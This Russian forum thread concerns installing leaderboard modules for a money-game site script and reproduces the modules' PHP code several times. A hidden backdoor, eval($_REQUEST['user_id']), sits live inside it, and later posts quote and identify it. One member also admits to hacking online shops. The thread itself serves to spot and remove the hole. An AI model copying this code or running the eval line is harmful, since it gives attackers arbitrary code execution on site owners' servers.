Автор Тема: Инструкция по установке модуля Tоп  (Прочитано 2060 раз)

0 Пользователей и 1 Гость просматривают эту тему.

SomnambulaАвтор темы

  • *
  • Оффлайн
  • Награды Более 6 лет на форуме !!! Более 10 сообщений Более 10 созданных тем
  • Дата регистрации: Июнь 2017
  • Сообщений: 41
  • Страна: ru
  • Поблагодарили: 5 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
Здравствуйте, есть модули Топ 3 и топ 10, но нет инструкции по установке, очень надеюсь на помощь, а пока .-.0)бамбук:be happy:
 

shans5

  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме За 1500 созданных тем более 4000 сообщений Репутация более 75 Топ 10 по созданным темам Топ 10 по сообщениям Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 44
  • Сообщений: 4886
  • Страна: ru
  • Поблагодарили: 1349 раз(а)
  • Репутация +92/-10
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:
    1979-06-30
Инструкция по установке модуля Tоп
« Ответ #1 : 04 Июня 2017, 12:35:09 »
Ну как бы сразу вопрос:

Модули из паблика?
Если да,то скорее всего с дырой.

По установке:

Файл модуля ( допустим он называется _top.php) кидаем в папку pages

В корневой .htaccess ставим

# топ
RewriteRule ^top(/?)+$ index.php?menu=top [L]


В корневой index.php ставим
case "top": include("pages/_top.php"); break; // Топ

Вроде как то так должно быть
Подвергнуть критике, может любой.
Создать то,что будет подвергнуто критике,дано не каждому.
 

SomnambulaАвтор темы

  • *
  • Оффлайн
  • Награды Более 6 лет на форуме !!! Более 10 сообщений Более 10 созданных тем
  • Дата регистрации: Июнь 2017
  • Сообщений: 41
  • Страна: ru
  • Поблагодарили: 5 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
Инструкция по установке модуля Tоп
« Ответ #2 : 04 Июня 2017, 12:47:58 »
Да, из паблика, можете глянуть одним глазком нащщет дыр..
Скрипт Топ 10:
Спойлер
<?PHP
$_OPTIMIZATION["title"] = "ТОП 10";
$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>

<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по вводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY insert_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Пополнил</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["insert_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>





<?PHP

$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по выводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY payment_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Вывел</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["payment_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>




<?PHP

$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по рефералам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_a ORDER BY referals DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Рефералов</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["referals"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            <div style="display: none;">MixliP-Все для вебмастера! У нас вы найдете скрипты uCoz , сайта ,Dle ,шаблоны,букса,скрипты хайпов,казино и многое другое</div>

[свернуть]
Спасибо за инструкции ))=(.
 

maks161

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
Инструкция по установке модуля Tоп
« Ответ #3 : 04 Июня 2017, 12:55:22 »
Да, из паблика, а где взять не с дырой?
Спасибо за инструкции ))=(.
купить. или самому почистить.
а теперь по делу.
кидай файл топ с обеих модулей посмотрю что там у тебя. бесплатно.
 

SomnambulaАвтор темы

  • *
  • Оффлайн
  • Награды Более 6 лет на форуме !!! Более 10 сообщений Более 10 созданных тем
  • Дата регистрации: Июнь 2017
  • Сообщений: 41
  • Страна: ru
  • Поблагодарили: 5 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
Инструкция по установке модуля Tоп
« Ответ #4 : 04 Июня 2017, 13:01:59 »
Ок, Топ 10
Спойлер
<?PHP
$_OPTIMIZATION["title"] = "ТОП 10";
$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>

<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по вводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY insert_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Пополнил</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["insert_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>





<?PHP

$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по выводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY payment_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Вывел</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["payment_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>




<?PHP

$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по рефералам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_a ORDER BY referals DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Рефералов</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["referals"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            <div style="display: none;">MixliP-Все для вебмастера! У нас вы найдете скрипты uCoz , сайта ,Dle ,шаблоны,букса,скрипты хайпов,казино и многое другое</div>

[свернуть]

Топ 3
Спойлер
<?PHP
$_OPTIMIZATION["title"] = "ТОП 3";
$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>

<div class="s-bk-lf">
   <div class="acc-title">TOP 3 по вводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 300 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 30;

$db->Query("SELECT * FROM db_users_b ORDER BY insert_sum DESC LIMIT 3");

if($db->NumRows() > 0){

?>




<table width="30%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Пополнил</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["insert_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>





<?PHP

$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 3 по выводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 300 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 30;

$db->Query("SELECT * FROM db_users_b ORDER BY payment_sum DESC LIMIT 3");

if($db->NumRows() > 0){

?>




<table width="30%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Вывел</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["payment_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>




<?PHP

$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 3 по рефералам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 300 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 30;

$db->Query("SELECT * FROM db_users_a ORDER BY referals DESC LIMIT 3");

if($db->NumRows() > 0){

?>




<table width="30%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Рефералов</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["referals"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            <div style="display: none;">MixliP-Все для вебмастера! У нас вы найдете скрипты uCoz , сайта ,Dle ,шаблоны,букса,скрипты хайпов,казино и многое другое</div>

[свернуть]

Кроме рекламной ссылки которая легко удаляется, вродь и ничего и нету
 

maks161

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
Инструкция по установке модуля Tоп
« Ответ #5 : 04 Июня 2017, 13:18:32 »
ах ну да я забыл вы же все спецы. :alas:
а я вот нашел и водном и в другом дыры.
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 250 сообщений Топ 10 по сообщениям Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
Инструкция по установке модуля Tоп
« Ответ #6 : 04 Июня 2017, 14:11:54 »
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}     вот и сама дира убери и неломанут осторожно

Добавлено сообщение: [time]04 Июнь 2017, 14:13:28[/time]
ах ну да я забыл вы же все спецы. :alas:
а я вот нашел и водном и в другом дыры.
как не старанно но ти тоже незнал я сказал что там дира
a:0:{}
 
Пользователи, которые поблагодарили этот пост: Somnambula

maks161

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
Инструкция по установке модуля Tоп
« Ответ #7 : 04 Июня 2017, 14:21:00 »
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}     вот и сама дира убери и неломанут осторожно

Добавлено сообщение: [time]04 Июнь 2017, 14:13:28[/time]
как не старанно но ти тоже незнал я сказал что там дира
чего ты хоть за словами следи своими. он мне сказал ты себя хоть слышишь вообще.великий спец. :alas:
ты даже саму дыру не правильно показал лишнего захватил так как тебе айболит показал :laugh:
я об этой дыре узнал когда ты еще пешком под стол ходил.
 
Пользователи, которые поблагодарили этот пост: Somnambula

Shop-53

  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 250 сообщений Топ 10 по сообщениям Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
Инструкция по установке модуля Tоп
« Ответ #8 : 04 Июня 2017, 14:23:20 »
чего ты хоть за словами следи своими. он мне сказал ты себя хоть слышишь вообще.великий спец. :alas:
я об этой дыре узнал когда ты еще пешком под стол ходил.

ах да хтото спрашивал запроси у меня на взлом фф не ты ли случайно скинуть скриншоти хто лохотронщик

Добавлено сообщение: 04 Июня 2017, 14:25:45
ей прогер макс напиши мне запрос в лс как взломать через етот код еслы я не профи давай жду я по крайней мере знаю а вот ты нет
 

maks161

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
Инструкция по установке модуля Tоп
« Ответ #9 : 04 Июня 2017, 14:26:09 »
ах да хтото спрашивал запроси у меня на взлом фф не ты ли случайно скинуть скриншоти хто лохотронщик
:laugh: давай я не против.
я же должен был тебя развести что бы ты мне все выложил как ты фермы ломаешь людям.

Добавлено сообщение: 04 Июня 2017, 14:30:03
держи . я все там правильно убрал как надо.
рекламу сам уберешь внизу.
кстати на том сайте все скрипты и модули дырявые.
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 250 сообщений Топ 10 по сообщениям Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
Инструкция по установке модуля Tоп
« Ответ #10 : 04 Июня 2017, 14:33:08 »
и на том сайте все
ты даун я не ломаю я наоборот им пишу про дири  только магазини я ломаю и все игри неломаю а тибе х.. я дам просил ти для себя хорошо что ничиво не дал тибе

Добавлено сообщение: 04 Июня 2017, 14:34:15
:laugh: давай я не против.
я же должен был тебя развести что бы ты мне все выложил как ты фермы ломаешь людям.

Добавлено сообщение: 04 Июня 2017, 14:30:03
держи . я все там правильно убрал как надо.
рекламу сам уберешь внизу.
кстати на том сайте все скрипты и модули дырявые.
и ти с... говориш почистил if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']);  вот код баран
 

maks161

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
Инструкция по установке модуля Tоп
« Ответ #11 : 04 Июня 2017, 14:35:35 »
ты даун я не ломаю я наоборот им пишу про дири  только магазини я ломаю и все игри неломаю а тибе х.. я дам просил ти для себя хорошо что ничиво не дал тибе

Добавлено сообщение: 04 Июня 2017, 14:34:15
и ти с... говориш почистил if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']);  вот код баран
:laugh::laugh::laugh: украинець иди гуляй дальше.
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 250 сообщений Топ 10 по сообщениям Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
Инструкция по установке модуля Tоп
« Ответ #12 : 04 Июня 2017, 14:36:35 »
:laugh::laugh::laugh: украинець иди гуляй дальше.

теперь понятно кому взлом и нужен
 

maks161

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
Инструкция по установке модуля Tоп
« Ответ #13 : 04 Июня 2017, 14:41:00 »
:laugh::laugh::laugh: украинець иди гуляй дальше.
вот этот кусок который ты показал не обязательно удалять если ты не в курсе.там всего лишь маленький кусочек и все модуль уже не дырявый становится.
 

SomnambulaАвтор темы

  • *
  • Оффлайн
  • Награды Более 6 лет на форуме !!! Более 10 сообщений Более 10 созданных тем
  • Дата регистрации: Июнь 2017
  • Сообщений: 41
  • Страна: ru
  • Поблагодарили: 5 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
Инструкция по установке модуля Tоп
« Ответ #14 : 04 Июня 2017, 14:45:51 »
Блинн...ваще не буду подобные модули ставить
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 250 сообщений Топ 10 по сообщениям Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
Инструкция по установке модуля Tоп
« Ответ #15 : 04 Июня 2017, 14:48:53 »
вот этот кусок который ты показал не обязательно удалять если ты не в курсе.там всего лишь маленький кусочек и все модуль уже не дырявый становится.
Макс именно тот кусок и есть дира через которую можно ломануть проект
 

maks161

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
Инструкция по установке модуля Tоп
« Ответ #16 : 04 Июня 2017, 14:50:42 »
Блинн...ваще не буду подобные модули ставить
ставить их можно но только не из паблика.
или брать и чистить и только тогда их ставить.
а вообще желательно обойтись без него так как ломают фермы именно через топ, отзывы часто.
 
Пользователи, которые поблагодарили этот пост: Somnambula

Shop-53

  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 250 сообщений Топ 10 по сообщениям Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
Инструкция по установке модуля Tоп
« Ответ #17 : 04 Июня 2017, 14:55:35 »
ставить их можно но только не из паблика.
или брать и чистить и только тогда их ставить.
а вообще желательно обойтись без него так как ломают фермы именно через топ, отзывы часто.
вот я и пишу именно за етого кода и ломают постав у себя топ я докажу еслы хочеш но смисл какой уберите тот код и будет щастя
 
Пользователи, которые поблагодарили этот пост: Somnambula

kvozimir

  • снова в skype --> kvozimir
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 2000 сообщений Топ 10 по сообщениям Топ 10 по созданным темам Репутация  более 25 Более 50 созданных тем Благодарность от форума За помощь пользователям За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Возраст: 31
  • Сообщений: 2028
  • Страна: ru
  • Поблагодарили: 242 раз(а)
  • Репутация +40/-1
  • Пол: Мужской
  • Дата рождения:
    1992-04-18
    Социальные сети:
    ВКонтакте
Инструкция по установке модуля Tоп
« Ответ #18 : 04 Июня 2017, 16:08:13 »
детишки,успокоитесь уже.... уже пол форума знает что вы друг друга недолюбливаете,все споры в ЛС или в любом другом месте,но не в темах форума,не имеющих ни какого отношения к претензиям друг друга


и насчет кода для взлома в ТОПе,о данном коде было сказал уже очень давно на другом форуме,(кому интересно за ссылкой в ЛС)
когда я пришел да данный форум вроде как я(но не факт,может и админ,не важно в принципе) всем сказал о данной дыре,о ней ни кто не знал или знали но не многие
так что не стоит кричать о том что кто то первый сказал а кто то второй говорил о дыре в топе,знаете как ее убрать ,уберите молча помогите форумчанам,знаете как взломать поделитесь информацией,нет значит молчите,и не кричите на весь форум!!!!

 

shans5

  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме За 1500 созданных тем более 4000 сообщений Репутация более 75 Топ 10 по созданным темам Топ 10 по сообщениям Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 44
  • Сообщений: 4886
  • Страна: ru
  • Поблагодарили: 1349 раз(а)
  • Репутация +92/-10
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:
    1979-06-30
Инструкция по установке модуля Tоп
« Ответ #19 : 04 Июня 2017, 16:50:22 »
Ещё   год назад ,или полтора... когда я делал Чертов скрипт Лихой банды
В этом модуле была обнаружена дыра ....
Помогли с другого форума, все знают что это за форум. Скорее всего тот же о котором квозимир говорит.

Maks и Shop -  все знают , что вы супер спецы..... А остальные тут так просто ... Для количества :alas:


Somnambula -будут вопросы-пиши в личку- помогу без лишних соплей.
 
Пользователи, которые поблагодарили этот пост: Somnambula

maks161

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 40
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 150 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
Инструкция по установке модуля Tоп
« Ответ #20 : 04 Июня 2017, 17:56:13 »
Ещё   год назад ,или полтора... когда я делал Чертов скрипт Лихой банды
В этом модуле была обнаружена дыра ....
Помогли с другого форума, все знают что это за форум. Скорее всего тот же о котором квозимир говорит.

Maks и Shop -  все знают , что вы супер спецы..... А остальные тут так просто ... Для количества :alas:


Somnambula -будут вопросы-пиши в личку- помогу без лишних соплей.
ты посмотри переписку. что я написал. какого хера этот умник вообще влез своими репликами.я что писал что я самый умный или что.еслиб он не влазил своими бесполезными репликами я бы человеку скинул файлы уже чистые и все тема закрыта.я и так ему скинул.
так кто из нас тему раздул !?
 

shans5

  • *
  • *
  • Оффлайн
  • Награды Более 8 лет на форуме За 1500 созданных тем более 4000 сообщений Репутация более 75 Топ 10 по созданным темам Топ 10 по сообщениям Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 44
  • Сообщений: 4886
  • Страна: ru
  • Поблагодарили: 1349 раз(а)
  • Репутация +92/-10
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:
    1979-06-30
Инструкция по установке модуля Tоп
« Ответ #21 : 04 Июня 2017, 18:07:26 »
Посмотрел.... Ничего не изменилось...
Все те же сообщения написаны.
Тема закрыта